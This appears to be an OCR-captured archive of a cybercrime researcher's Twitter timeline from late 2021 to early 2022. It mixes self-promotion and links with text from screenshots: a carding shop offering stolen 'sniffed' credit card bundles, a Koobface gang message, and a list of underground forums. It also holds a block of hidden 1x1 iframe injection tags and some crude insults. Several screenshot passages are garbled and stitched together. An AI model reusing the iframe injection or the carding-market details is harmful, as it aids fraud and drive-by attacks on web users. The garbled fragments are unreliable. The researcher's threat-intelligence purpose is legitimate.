Combo 50 creditcards Combo 100 creditcards Combo 1000 creditcards
$15/card for 50 card(s) $15/card for 100 card(s) $15/card for 1000 card(s)
Normal price: $750 Normal price: $2560 Normal price: $45066
NOW: $575 NOW: $1100 NOW: $10500
06:07 


https://t.co/JIcqOaYgET https://t.co/UU80RyDay4 


06:07 
https://t.co/JTcqOaYgET https://t.co/diJnx4491E 
06:07


https://t.co/JTcqOaYgET https://t.co/K4gUI2DeZ5 


DATABASE: NOV#27_(SNIFFED-100) JOHNLEGEND UPDATE 
Added 113x card to Nov#27 (Sniffed-100) JohnLegend
27/Nov/2021 by MajorShop 


DATABASE: 26#NOVEMBER(SNIFF-TEES/LOW-US)_88X UPDATE 
Added 58x card to 26#November(SNIFF-TEES/LOW-US) 88x 
26/Nov/2021 by MajorShop 


DATABASE: 26#NOVEMBER(SNIFF-TEES/LOW-US)_88X UPDATE 
Added 55x card to 26#November(SNIFF-TEES/LOW-US) 88x 
26/Nov/2021 by MajorShop 


DATABASE: 26#NOVEMBER(SNIFFED-TEES-US)_ 54x UPDATE 
Added 52x card to 26#November(SNIFFED-TEES-US) 54x 
26/Nov/2021 by MajorShop 


DATABASE: 26#NOVEMBER(SNIFFED-TEES-US/AU)_50X UPDATE 
Added 50x card to 26#November(SNIFFED-TEES-US/AU) 50x
26/Nov/2021 by MajorShop 


7 - Tuesday 


04:46 


https://t.co/WLBKklyuhf #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintelligence #ThreatProtection 
9 - Thursday


16:25 


https://t.co/SGqQztcxaF #security #cybercrime #malware #CyberSec #CyberAttack 
#ThreatHunting #Threatintel #Threatintelligence #threatreport 


16:25 


https://t.co/yiAanNSVkZ #security #cybercrime #malware #CyberSec #CyberAttack 
#ThreatHunting #Threatintel #Threatintelligence #threatreport 


16:26 


https://t.co/7vCMCCfkpl #security #cybercrime #malware #CyberAttack 
#ThreatHunting #Threatintel #threatreport 
10 - Friday


05:01 


https://t.co/OmUajr8DT8 #security #cybercrime #malware #CyberSecurity 
#CyberSec #CyberAttack #cyberattacks #ThreatHunting #Threatintel 
#threatintelligence #threatreport https://t.co/jo3bRidPWR 


Disruptive Individuals — Boutique Cyber Intelligence Services


“We make Cyber Intelligence impact where no one has been before!”


09:25 


Show some love for my YouTube channel - https://t.co/OgnnO8saUO and stay tuned! 
Regards. Dancho #security #cybercrime #malware #CyberSecurity #CyberAttack 
#Threatintel 


11 - Saturday 


19:11 


https://t.co/JTcqOaYgET #security #cybercrime #malware #threatreport 
https://t.co/DAR51iXuDN 
12 - Sunday


01:23 
https://t.co/JTcqOaYgET https://t.co/I2BevoTW22 
01:23 


https://t.co/JTcqOaYgET https://t.co/2NN9qaRglIr 
01:23


https://t.co/JTcqOaYgET https://t.co/2GtNxzbaW
01:24


https://t.co/JTIcqOaYgET https://t.co/FPN8MScdil 




01:24 


https://t.co/JTcqOaYgET https://t.co/vP6eOOmoZd 
01:32

Psst! Check this out. This is @mikko detailing a botnet C&C using his name
which surprise surprise was registered using my name. It’s happy to know that you’re 
getting noticed by cybercriminals internationally. Keep it up! https://t.co/wBGrnAkJNY 
Primary server fel shilitex ke
Primary ip a@dewes 92, 46.53.180 


Last modified - 2011-03-09 11:55:26.0 
comin state oh - Mermal state, 


Begietar crested. SKILLTEX 


01:34 


It’s official. It’s 2008-2013 and I’m getting referenced by the Koobface Gang in its 
official C&C communication channels. Cheers! https://t.co/XDZ80tWaL2
C&C ARCHITECTURE


Compared with the complex C&C architecture of the Storm, WALEDAC, and DOWNAD botnets, the KOOBFACE C&C
infrastructure is very basic. It only consisted of infected nodes and C&C domains that used HTTP as its communication
protocol.


Figure 40. KOOBFACE C&C prior to July 19, 2009
Figure 41. Updated KOOBFACE C&C as of July 19, 2009


This simplistic C&C approach is, of course, very vulnerable to takedowns. After several KOOBFACE C&C takedown
attempts initiated by Internet service providers (ISP's) and members of the security industry, the KOOBFACE gang
realized the need for a more robust C&C infrastructure. Thus, on July 19, 2009, the KOOBFACE writers implemented
a new C&C architecture that involved the use of proxy nodes to provide redundancy and to improve the survivability of
their C&C should another takedown be attempted.


A few days after the new KOOBFACE C&C infrastructure was implemented, the botnet was seen inserting a message
(see below) for one of the security researchers tracking the malware's domain activities


01:35 


I might be in trouble for posting this but hey it’s the RBN that sent it to me for reference
purposes. Don’t forget. Diamonds degrade their quality. Bulletproof hosting services 
courtesy of the RBN are forever. https://t.co/jjuz2uEmiK 
[Screenshot: Wholesale domain registration and internet services -- OnlineNIC Inc. - Mozilla Firefox]
Missing the old school days? This is me getting referenced in the actual URL structure
of a popular scareware campaign. Glorious times. https://t.co/szzpUstB03 
It’s getting even better. I actually got a response to my "Top 10 Things You Didn’t
Know About the Koobface Gang" article which I posted on @ZDNet. The message was
left within the actual landing page for each and every Koobface Gang campaign. 
https://t.co/dTXW50EjZI 
Who’s winning the IoCs (Indicators of Compromise) race? I’m not quite sure but I
think I made it into a study on the topic. https://t.co/VToo08pGnU
ThreatPost 26% 37% 52% 29%
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87% 
Malwarebytes 32% 48% 26% 72% 
Hexacorn 49% 57% 59% 76% 
with Do's cyber assets
unacceptable. Initiate an 
immediate traceback! 


deception! While 
they concentrate 
on the mail 
servers, we'll 
transmit back the 
data obtained 
from the infected 


from the Russian 

to facilitate OSINT
said Sun Tzu!
Our team, so often called “Koobface Gang”, expresses high gratitude for the help in bug fixing, researches and documentation for our
software to:


- Kaspersky Lab for the name of Koobface and 25 millionth malicious program award;
- Dancho Danchev (http://ddanchev.blogspot.com) who worked hard every day especially on our First Software & Architecture version, writing lots of e-mails to different hosting companies and structures to take down our Command-and-Control (C&C) servers, and of course analyzing software under VM Ware;
- Trend Micro (http://trendmicro.com), especially personal thanks Jonell Baltazar, Joey Costoya, and Ryan Flores who had released a very cool document (with three parts!) describing all our mistakes we've ever made;
- Cisco for their 3rd place to our software in their annual “working groups awards”;
- Soren Siebert with his great article;
- Hundreds of users who send us logs, crash reports, and wish-lists.


In fact, it was a really hard year. We've made many efforts to improve our software. Thanks to Facebook's security team - the guys made us
move ahead. And we've moved. And will move. Improving their security system.


By the way, we did not have a cent using Twitter's traffic. But many security issues tell the world we did. They are wrong.

As many people know, “virus” is something awful, which crashes computers, steals credential information as good as all passwords and credit
cards. Our software did not ever steal credit card or online bank information, passwords or any other confidential data. And WILL NOT EVER.
As for the crashes... We are really sorry. We work on it :)

Wish you a good luck in new year and... Merry Christmas to you!


Always yours, “Koobface Gang”.
5.3. Understanding Intelligence Sources 

The availability of the longitudinal data (the IOCs collected over 
a span of 13 years) also enables us to investigate the qualities of 
the indicators produced by different sources and their timeliness 
against new threats, as reported below. 
Timeliness. Using the aforementioned attack clusters (see Table 7), 
we analyzed the distribution of the articles first reporting the 
attacks over different blogs, as shown in Figure 8b. We found that 10 
blogs were responsible for the first report of 60% of the clusters (each 
cluster likely to be a campaign). For example, the blog Dancho 
Danchev first reported 12 clusters, each time involving 45 IOCs on 
average, which later also showed up on other blogs. 
14:29 


https://t.co/JIcqOaYgET #security #cybercrime #Malware #CyberSecurity 
#cyberattacks #Threatintel https://t.co/GsEvTXXKs5 


2 
14:30 
https://t.co/JIcqOaYgET #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintel https://t.co/OqG6UWWLLy 
27 4 
17 - Friday 


05:48 


Virtual Space 


CYBERTERRORISM 
HOW REAL IS THE PROBLEM? 


THE INFORMATION ECONOMY, which the world has entered over the last 20 years, 
favors the development of modern means of communication, breaking down 
intercontinental and ethnic boundaries and adding new dimensions to the notion 
of the information society, though perhaps the more accurate notion is an 
information-dependent society! 

This article aims to examine the problem of information warfare and the 
cyberterrorism that invariably accompanies it, from different points of view. 
It will answer the following questions - what is cyberterrorism and what is the 
difference between it and information warfare? Can the actions of information 
warfare and cyberterrorism cause human casualties or economic chaos, and what 
are the possible scenarios? 


DANCHO DANCHEV. 




Since when does the "epidemic rise" of cryptoviral extortion also known as today’s 
modern ransomware threat constitute big news? It doesn’t. 


05:48 


Forget me if I’m wrong but dedicated onions and dedicated "negotiation" staff is total 
crap in terms of good old fashioned cybercrime syndicates. It’s just a way to 
monetize access to a malware infected host. 


05:48 
Back in 2006 I released the ubiquitous "Malware - Future Trends" white paper - 
https://t.co/g3X7CIZ2Mk where I discussed the rise of cryptoviral extortion and 
speculated that it’s a fad. Someone must have been reading that white paper back 
then. 


05:48 


Only a true retard will pay a complete stranger millions of dollars to begin with to 
minimize the damage caused by a potential negative PR campaign launched by the 
bad guys who will leak the stolen information anyway. Who cares about this 
information anyway? 


05:48 


Fueling growth into a fraudulent model is as bad as cybercrime 1.0 is in terms having 
cyber insurance companies actually paying you for getting hacked let’s not forget 
that you’re interacting with the bad guys to the point of oblivion. Bad stuff. 


05:48 


Backups and contingency planning techniques and mechanisms including disaster 
recovery and actual implementation of post-breach recovery process techniques are 
crucial to deal with this type of threat and hence this is the reality. 


05:48 


Buzz word generation is bad stuff especially in a world where I originally remember 
that it was @taosecurity who originally coined the term advanced persistent threat 
while I was busy emphasizing in the "malicious economies of scale" term at the time. 


05:48 


Keep your sources secret and confidential try to come up with new content 
around the bad guy’s activities that’s actually worth going through and don’t forget 
that you should never interact with the bad guys in one way or another just monitor 
them 


05:48 


The ransomware threat? The rise of the penetration testing crowd? The "certificate 
crowd"? The rise of threat hunting as a profession? Keep it simple stupid (KISS 
strategy) and don’t fuel growth into the bad guy’s business model. That’s cybercrime 
1.0 


05:48 


Try to do your best in terms of OPSEC when doing cybercrime research and bad guys 
research and profiling and do your best to communicate your findings as soon as 
possible including to communicate your research to as many people as possible. 


05:48 

Catch up here - https://t.co/JTcqOaYgET including here - https://t.co/UZ6qVANXVF and 
stay tuned! 

05:48 


Keep track of industry leading blogs and publications try to find out and emphasize 
on the technical perspective behind today’s modern rise of the cybercrime enterprise 
and always try to track them down and profile and attempt to take them offline. 


05:50 
My mother’s present for Christmas. https://t.co/o5GycNQUFp 
08:29 
https://t.co/MIMAgUwDgh 
08:29 
https://t.co/rLaighdAho 
08:30 


https://t.co/lwWh6wIM8W 
08:30 
https://t.co/wuuDOxrp8Z 
08:30 
https://t.co/Cmau52THYx 
08:31 
https://t.co/GOfOsIxB4b 
08:31 
https://t.co/POAivIFez} 
08:31 
https://t.co/rt3MUkyaUd 
08:31 
https://t.co/MOG4H90zmw 
08:39 
https://t.co/eGilP6durk 
11:40 
https://t.co/qLxz4GuRip [PDF] https://t.co/g50p9XfZyv 


Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 


The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 
Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


18 - Saturday 


00:33 
https://t.co/zg7gV6K5Q1 [PDF] https://t.co/LJN7tcidi9 
03:38 
https://t.co/JTcqOaYgET https://t.co/hixbwjA5MN 


03:39 


https://t.co/JTcqOaYgET https://t.co/SpEXmuF6eE 


03:39 


https://t.co/JTcqOaYgET https://t.co/BBhGzaCmaA 
03:53 


On the road. https://t.co/L2eLZ62QqS 
04:57 


I’m flattered. https://t.co/i8VJFYtHKW 


So, what this means is that any individual's success in the industry comes down to things like reputation, how well you 
can bullshit, etc. But ultimately we have no way to differentiate, say, Bruce Schneier, who has a long academic- and 
professional-grade track record and a habit of writing in a highly intellectual fashion on difficult topics, from Dancho 
Danchev, who is a random Russian dude very few people know anything about, who posts random snippets of facts that 
pass for “analysis.” 


04:59 
Takes you back doesn’t it? https://t.co/ml97FsOX2t 
hilary kneber @hilarykneber - Jan 16, 2011 
#DANCHO DANCHEV Does anyone know. Is there a way I can determine 
the exact date that Dancho Danchev began to “unfollow" me? 


05:02 
Back in the day. https://t.co/i6Bhzo4DeY 


05:26 


Happy holidays! https://t.co/Q5kOTsqF8C 
05:28 


Happy holidays! https://t.co/tiVLtv3dZK 
05:28 


Happy holidays! https://t.co/etN7zg8JsO 


05:29 
Attending a private party. Approximately a decade ago. https://t.co/gCygKZ282Y 
05:31 


Just when you thought I’m missing. Gotcha! https://t.co/Pbl17xXhgf6 
05:32 
Happy holidays! https://t.co/bzqvitwp40 


05:34 
Old Twitter cover photos. Courtesy of me. https://t.co/MucO3MOW1V 


*1 
DDanchev 
Costs Daddy 
Money 


Dancho Danchev 


05:35 


DDanchev 
Costs Daddy 
Money 


Dancho Danchev 


https://t.co/JTIcqOaYgET https://t.co/BOTtO9gBPx 




06:57 


https://t.co/nNsXMPrGi0 https://t.co/TdwnbezBG1 


Underground Who’s Who in 
Cyber Crime for 2007? 


<iframe src=./n404-1.htm width=1 height=1 ></iframe> 
<iframe src=./n404-2.htm width=1 height=1 ></iframe> 
<iframe src=./n404-3.htm width=1 height=1 ></iframe> 
<iframe src=./n404-4.htm width=1 height=1 ></iframe> 
<iframe src=./n404-5.htm width=1 height=1 ></iframe> 
<iframe src=./n404-6.htm width=1 height=1 ></iframe> 
<iframe src=./n404-7.htm width=1 height=1 ></iframe> 
<iframe src=./n404-8.htm width=1 height=1></iframe> 
<iframe src=./n404-9.htm width=1 height=1></iframe> 


18:46 
https://t.co/eGilP6durk 
18:47 
https://t.co/3O0Etoz0Tvv 
18:47 
https://t.co/aiHCMkEoAD 
18:47 
https://t.co/se5hIPllaF 
18:47 
https://t.co/M7l6vTDu7a 
18:48 
https://t.co/sZXGMvSSgK 
18:48 


https://t.co/XdTkKQMkWm1 
18:48 
https://t.co/ixAOmiA0O0d 


18:48 
https://t.co/99acM24Alq 


19 - Sunday 


21:57 
https://t.co/UZ6qVANXVE https://t.co/zDYzD4gaTi 


Dancho Danchev 


An In-Depth Picture 
Inside Security 
Researcher's Dancho 
Danchev Understandin 
of Security Hacking an 
Cybercrime Incidents 


Dancho 


Danchev's 
Personal 
Security 
Hacking and 
Cybercrime 
Research 
Memoir 
21:57 


20 - Monday 


07:07 


https://t.co/UZ6qVANXVE https://t.co/3z3qGaYt5H 


Dancho 
Danchev's 
Security 
Research 
Compilation 


“Never-published before security research articles 
and OSINT analysis at Dancho Danchev's Medium 
account” 


By Dancho Danchev 


https://t.co/FdQd7iGsds https://t.co/iK39YKDLC1 
Table 9: Quality of selected intelligence sources (10 out of 45) 


07:14 
https://t.co/RftVOpFC3C https://t.co/DvmyE1tdJ9 
07:15 
https://t.co/aAs2RawETM 
*1 
18:10 


This is me on the Dark Web - https://t.co/cQq40tVcwD #security #cybercrime 
#malware #CyberSecurity #CyberAttack #cyberattacks #Threatintel 
#Threatintelligence #ThreatHunting #threatreport https://t.co/53Bn0rpKdc 


21 *1 
22 - Wednesday 


02:13 


https://t.co/fnswrm8KWP #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #Threatintelligence #threatreport #threatintel 
https://t.co/Zgx92fvdxXb 
23 - Thursday 


11:24 


@selenalarson Check this out! This is so old school and scareware related that I can’t 
stop referencing it. This is a screenshot of a sample redirection campaign that’s using 
my name in the URL structure. I have a few more in the works if you want me to 
share them. https://t.co/Ydvelz5uAE 




11:27 


Takes you back doesn’t it? https://t.co/JTcqOaYgET #security #cybercrime #malware 
#cyberattacks #CyberAttack #Threatintel #Threatintelligence #ThreatHunting 
#threatreport https://t.co/3XFuwTuYGp 




My security predictions for 2022? The #ransomware epidemic will be fought using 
common logic while using customer support Dark Web onions for negotiations or by 
saying - "hey Dmitry is it you on the other side of the chat?" https://t.co/JTcqOaYgET 


*1 
11:35 


@SwiftOnSecurity Or in the best possible case they can also listen to my album 
courtesy of "fans" all around the globe - https://t.co/zhtnSGqqPa 
https://t.co/emldJ6NtJs 


*1 


DANCHO DANCHEV 
SUCK MY DICK 


11:39 
@tarah LinkedIn resume export seems to work just fine. At least for me. Keep it up! 
11:44 

@Treadstone71LLC Happy holidays Jeff! 


24 - Friday 


01:40 


Awesome. This is me making the news! Stay tuned. "Acing the IOC Game: Toward 
Automatic Discovery and Analysis of Open-Source Cyber Threat Intelligence" - 
https://t.co/NoRSaHb1jG [PDF] #security #cybercrime #malware #Threatintel 
#Threatintelligence https://t.co/iynsFTTQAO 


Table 9: Quality of selected intelligence sources (10 out of 45) 


19:16 


https://t.co/DUBHsc9qNw #security #cybercrime #malware #CyberAttack 
#cybercriminals #Threatintel #Threatintelligence #threathunting 
27 - Monday 


05:25 


Folks. Happy holidays and happy New Year Celebration! Keep up the good work and 
keep up the spirit and big thanks to everyone who approached me in 2021 with 
research requests or just to say "hi". Keep up the spirit! Regards. Dancho 
https://t.co/RUCPFfSO3X 


*1 


28 - Tuesday 
18:53 


Happy Holidays! Grab all of my publicly accessible research as a Torrent! Direct 
download available! - https://t.co/Ar8MYfSIYQ #security #cybercrime #malware 
#CyberSec #CyberAttack #ThreatHunting #Threatintel #Threatintelligence 
#threatreport https://t.co/aNv7M2nw6m 


18:54 


Big news! Grab a copy of my official "Cybercrime Forum Data Set for 2021" for free in 
the form of a Torrent! Direct download available - https://t.co/I8AL7DQBb5 #security 
#cybercrime #malware #CyberAttack #ThreatHunting #Threatintel 
#Threatintelligence https://t.co/ZzHobMcdPlirw 


21 ¥*1 


<parent> Darkmoney iHonker ShadowMarket 


11Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuit.vn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell MaulTalk Szuwi 
Aljyyosh Forum.Zloy.bz Mmpg.ru Tenebris 
Antichat.ru ForumSape Mr11-11mr.7olm.org TheBot 
ArmadaBoard ForumSEO Nullnoss.org Toolbabase.se 
BigFozzy Free-hack pay-per-install.org TotalBlackhat 
BlackhatWorld ghostmarket.net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta.pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters.ru 
Chf gofuckbiz.com ProLogic Whitehat.vn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase www.opensc.ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
Cracked.to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket.la iFud 


30 - Thursday 


17:33 


New layout - https://t.co/fnswrm8KWP #security #cybercrime #malware 
#CyberSecurity #cybersecuritytips #cyberattacks #CyberSec #Threatintel 
#ThreatHunting 
2022 


January 


1 - Saturday 


08:23 


Grab the torrent! https://t.co/ZH8epDDTWP #security #cybercrime #malware 
#CyberAttack Enjoy! https://t.co/E30s4cVu49 


23 *1 


08:23 
Grab the torrent! https://t.co/TqP4kY7bwF #security #cybercrime #malware 
#CyberAttack Enjoy! https://t.co/xEq2vE6q3h 
22 2 
11:00 
https://t.co/jqyBRrDbeD #security #cybercrime #malware #CyberAttack 
#cyberattacks #Threatintelligence 
*1 
2 - Sunday 
03:46 


Guess what? The World’s most popular and in-depth search engine for hackers and 
security experts is back - https://t.co/OdJ7QhPjP5 check out the front page - 
https://t.co/fnswrm8KWP including our Wordpress blog - https://t.co/T3YfdBnuVz 


03:49 


"Visiting the GCHQ With the Honeynet Project Circa 2008 - A Conference and Event 
Recap" - https://t.co/FdQd7iGsds #security #cybercrime #malware #cyberattacks 
#ThreatHunting #threatintelligence 


*1 
03:50 
"Modularity, Monocultural Insecurities and the Establishment of a NSA culture in the 
cybercrime world - Keep it coming?" - https://t.co/2hfqnBoPEu #security #cybercrime 
#malware #cyberattacks #ThreatHunting #threatintelligence 
03:50 


"Foreign Influence Operations - “Sock Puppetry” or “Let me Catch Up with Russian 
Active Measures”?" - https://t.co/CTXOoRYV1n #security #cybercrime #malware 
#cyberattacks #ThreatHunting #threatintelligence 


03:51 


"Silence in the Dark - How to Establish the Foundations for a Successful OPSEC 
Strategy for the Purpose of SIGING Cyber Asset Discovery?" - https://t.co/qugnqoixXg] 
#security #cybercrime #malware #cyberattacks #ThreatHunting #threatintelligence 


03:52 


"Exclusive Interview with https://t.co/X2Z28aSWfB’s Primary Project Operator - 
Security Researcher - Dancho Danchev" - https://t.co/O2ss8ghqkj #security 
#cybercrime #malware #cyberattacks #ThreatHunting #threatintelligence 


*1 
03:53 


"Introducing https://t.co/X2zZ28aSWfB’s Flagship “Data Paradise” Old-School 
KGB-Style Dial-In Intranet" - https://t.co/ocngNKjASC #security #cybercrime 
#malware #cyberattacks #ThreatHunting #threatintelligence 


03:54 


"Introducing https://t.co/X2zZ28aSWfB’s Flagship Hacking and Security Search Engine! 
We're back! Introducing https://t.co/X2zZ28aSWfB’s Flagship Hacking and Security 
Search Engine! We're back!" - https://t.co/vo5KLLIhm1gq #security #cybercrime 
#malware 


04:14 


Who's into VR? Who’s into VR for information security? I did this project in my spare 
time and we’re currently accepting donations and crowdsourcing the funding. Check 
out project Cybertronics here - https://t.co/8VvgQ10IJL #security #cybercrime 
#malware 


el 


08:00 


https://t.co/WIBGTU5ryT #security #cybercrime #malware #threatintel 
https://t.co/wS3vLkoD5n 


08:00 


https://t.co/Qokw7qnyYf #security #cybercrime #malware #threatintel 
https://t.co/CS5aab2LZVv 


Dancho Danchev's Blog - 
Mind Streams of 
Information Security 
Knowledge 


08:01 


https://t.co/cQq40tVcwD #security #cybercrime #malware #threatintel 
https://t.co/YNfOnf7106 
08:02 


https://t.co/8KKLYQSBQB #security #cybercrime #malware #threatintel 
https://t.co/cK2DzZOpkQn 


*1 


Popular Tags: 
Hacker Group Cybercrime Forum Cybercrime Forum Community 
Cybercrime Community Cybercrime Forum Data Set 


Unit-1 


wid 


23 


Leadi ber Threat intelligence Products Porta 


08:02 


https://t.co/OmUajr8DT8 #security #cybercrime #malware #threatintel 
https://t.co/JJCFCqG6PN 
Disruptive individuals - Boutique Cyber Intelligence Services 


“We make Cyber Intelligence 
impact where no one has 


been before!" 


Our Services 


Technical Collection 


08:03 


https://t.co/sMWCGUWR6g #security #cybercrime #malware #threatintel 
https://t.co/iyyv2qswLK 


Dancho Danchev 


Exposing the “Data Leaks” Paradise — A 
Qualitative Analysis of Today's “Data 
Leaks” Paradise 


3 - Monday 

07:44 

https://t.co/gej8f4CWpN #security #cybercrime #malware #CyberAttack #CyberSec 
#Threatintel #ThreatHunting 


08:33 


https://t.co/fnswrm8KWP #security #cybercrime #malware #CyberAttack #CyberSec 
#Threatintel #ThreatHunting https://t.co/wZUMJ7COhC 


08:34 


https://t.co/fnswrm8KWP #security #cybercrime #malware #CyberAttack #CyberSec 
#Threatintel #ThreatHunting https://t.co/MNBaQvFfo3 


Hello world! 
4 - Tuesday 


13:30 


"A Copy of Dancho Danchev’s CV - An In-Depth Perspective on the Cyber Threat 
Landscape - An Analysis" - https://t.co/iM3H2foW3y #security #cybercrime 
#malware #CyberAttack #CyberSec #cybersecuritytips 


21 *1 
13:31 
"A Peek Inside Today’s Modern RATs (Remote Access Tools) and Trojan Horses 
C&C (Command and Control) Communication Channels - An OSINT Analysis" - 
https://t.co/WkN6lOsnYs #security #cybercrime #malware #CyberAttack #CyberSec 
#cybersecuritytips 


2 
13:32 
"A Peek Inside Today’s Modern Cybercrime Ecosystem - A Portfolio of Currently Active 
Cybercrime-Friendly Forum Communities - An OSINT Analysis" - https://t.co/kKI5qLJPJc7 
#security #cybercrime #malware #CyberAttack #CyberSec #cybersecuritytips 


22 *%1 
13:32 
"Exposing a Currently Active Portfolio of Domains Belonging to Iran-Based Hacker 
Groups and Lone Hacking Teams - An OSINT Analysis" - https://t.co/C4TUvMnBu8 
#security #cybercrime #malware #CyberAttack #CyberSec #cybersecuritytips 


21 *%2 
13:33 
"Multiple Security/Cybercrime Research/OSINT/Threat Intelligence Gathering Memoir 
Compilations - An Analysis" - https://t.co/Pkw48BZ5t0O #security #cybercrime 
#malware #CyberAttack #CyberSec #cybersecuritytips 


23 *l1 
13:38 


Who wants to help me drive growth for my research and really really motivate me to 
present the crown jewels of my research online? Grab an account today - 
https://t.co/WIBGTU5ryT RT pls! #security #cybercrime #malware 

13:38 


Bulk orders for organizations and vendors including teams accepted at - 
https://t.co/WIBGTU5ryT drop me a line at dancho.danchev@hush.com #security 
#cybercrime #malware 
13:39 


Finally! It’s here! The Second Edition of my official "Cybercrime Forum Data Set for 
2021" - https://t.co/rgsEandTx7 grab a copy today! Direct download available! Stay 
tuned! #security #cybercrime #malware 


13:40 


https://t.co/rgsEandTx7 RT pls! #security #cybercrime #malware #CyberSecurity 
#CyberAttack #CyberSec #cybersecuritytips 


15:30 


@mrisher @kevincollier It gets even more interesting. Check out some of my latest 
research here - https://t.co/KqhOgR63gE and here - https://t.co/AGHOL4TKgd 


*1 
22:56 


Want to give your team or organization a pretty decent and good situational 
awareness in the World of cybercrime fighting and cyber threat actor profiling 
including cyber intelligence? Grab a lifetime account today - https://t.co/eKnnHPq85t 


5 - Wednesday 


00:33 


It’s official and we're live! Grab a copy of my Second Edition of my Cybercrime Forum 
Data Set for 2021 and improve your situational awareness in the World of cybercrime 
research - https://t.co/rgsEandTx7 let’s catch some bad guys! 


11:53 
Jessus! Jessus! - https://t.co/3nuHFv5csD #NowPlaying 
12:26 
Takes you back doesn’t it? https://t.co/fCGJetBX8H 
*1 


13:03 


Quote of the day - "If terrorism is a form of crime then cybercrime is a form of 
economic terrorism". 


13:04 

Quote of the day - "An OSINT conducted today is a tax payer’s buck saved 
somewhere". 
13:07 
God bless! - https://t.co/toNzEdf8Xs 

6 - Thursday 
02:58 


Re-defining the very basics of total irrelevance peasant-aria including the very basics 
of agricultural "economy". Courtesy of "Republic" of #Bulgaria. Sanctions anyone? 
You bet - https://t.co/p5JOSk3IDd This is me on #Bulgaria - https://t.co/oxz4STGXwr 

https://t.co/uv7ym4qZpM 
03:19 
https://t.co/eA8DCIZgNQ 
03:19 
https://t.co/I8IN78UTpe 
03:19 
https://t.co/Q7QgXQ3xn7 
03:19 
https://t.co/qhX7shFRLQ 
03:19 
https://t.co/tfoGvc4oyK 
03:19 
https://t.co/YAvxahXPUO 


03:23 
Check this out! Keep it coming! Awesome! - https://t.co/glICLBSgtM8 
03:23 
https://t.co/MPhUGY6IKD 
03:23 
https://t.co/VemuwgD7EV 
03:24 
https://t.co/fQygqc3AgB 
03:24 
https://t.co/RWTfPvmedT 
03:24 
https://t.co/w34T4rA4pj 
03:24 
https://t.co/XVWI8CfrBB 
03:25 
https://t.co/wa0q57QPdw 
8 - Saturday 
04:47 
https://t.co/lvQmH4tbSD 
04:47 
https://t.co/kyLVXzkI6i 
04:48 
https://t.co/imRPmj73cE 
04:48 
https://t.co/kDvWT5q5en 
04:48 


https://t.co/qCjuZz8mmZ 
04:49 
https://t.co/rAkmhC873G 


21:06 

https://t.co/sGHnvYmNrP 
21:06 

https://t.co/22wCdqL2D9 
21:06 

https://t.co/d6djJAo32r 

10 - Monday 
14:58 


https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#cybersecuritytips #cyberattacks #CyberSec #threatreport https://t.co/crl2QHpnZO 




16 - Sunday 


12:16 


The Lab circa 2006 when I originally finished studying in the Netherlands up to 
present day! Stay tuned! #security #cybercrime #malware #CyberAttack 
#cyberattacks #ThreatResearch #ThreatIntelligence https://t.co/4AA4uft8up 


12:19 


Courtesy of me! #security #cybercrime #malware #CyberAttack #cyberattacks 
#ThreatResearch #Threatintelligence https://t.co/DxwObpjRRk 


23 *1l 


Such dare interference with Do's cyber assets is unacceptable. Initiate an 
immediate traceback! 


cyber deception! While they concentrate on the mail servers, we'll 
transmit back the data obtained from the infected 


Our NIDS 


from the Russian 
to facilitate OSINT through botnets. “Ensure your victory before 
starting a battle”, said Sun Tzu! 


The Chinese are getting smarter Andrei. Last month they bought access to 
mil and .gov infected hosts only, and took at 


It's called “segmenting the attack population” Yuri. Perhaps we 
should print out new brochures. 


this Pentagon 


puppet show now 


mailservers. 


www.stripgenerator.com 


12:23 


https://t.co/zg7gV6K5Q1 [RAR] #security #cybercrime #malware #CyberAttack 
#cyberattacks #ThreatResearch #ThreatIntelligence CC: @Treadstone71LLC 
https://t.co/FDtrja4frp 


21 %1 


KAMALIAN Behrouz | POB: Tehran, DOB: 1983 | Head of the IRGC-linked “Ashiyaneh” cyber group. 
The “Ashiyaneh” Digital Security, founded by Behrouz Kamalian is responsible for an 
intensive cyber-crackdown both against domestic opponents and reformists and foreign 
institutions. On 21 June 2009, the internet site of the Revolutionary Guard's Cyber 
Defence Command posted still images of the faces of people, allegedly taken during 
post-election demonstrations. Attached was an appeal to Iranians to 
“identify the rioters”. | 10.10.2011 


12:27 


ZDNet Zero Day headshot! Here we go! https://t.co/HLHdhYbdX3 [PDF] #security 
#cybercrime #malware #CyberAttack #cyberattacks #ThreatResearch 
#Threatintelligence https://t.co/8zibNFZ7tH 
12:37 


Cheers! #security #cybercrime #malware #CyberAttack #cyberattacks 
#ThreatResearch #Threatintelligence https://t.co/oN730kcUvh 


EXPOSING KOOBFACE: THE 
WORLD'S LARGEST BOTNET 
DANCHO DANCHEV Cyber 


12:41 


Webroot headshot! Here we go! - https://t.co/tW2LuSxdSi [PDF] #security 
#cybercrime #malware #CyberAttack #cyberattacks #ThreatResearch 
#Threatintelligence https://t.co/9ELpotiuKD 
12:47 


Cheers! #security #cybercrime #malware #CyberAttack #cyberattacks 
#ThreatResearch https://t.co/8SHLn5gjtm 




12:52 


Keynote at CyberCamp 2016! #security #cybercrime #malware #CyberAttack 
#cyberattacks #ThreatResearch https://t.co/pZ7PuAeldV 


• ... conducted a several hours experiment in November, 2009 when for the first time ever client-side


• The Koobface gang was behind the massive (1+ million affected web sites) scareware serving campaign in


17 - Monday


05:07 


https://t.co/qLxz4GuRip #security #cybercrime #malware #Threatintelligence 
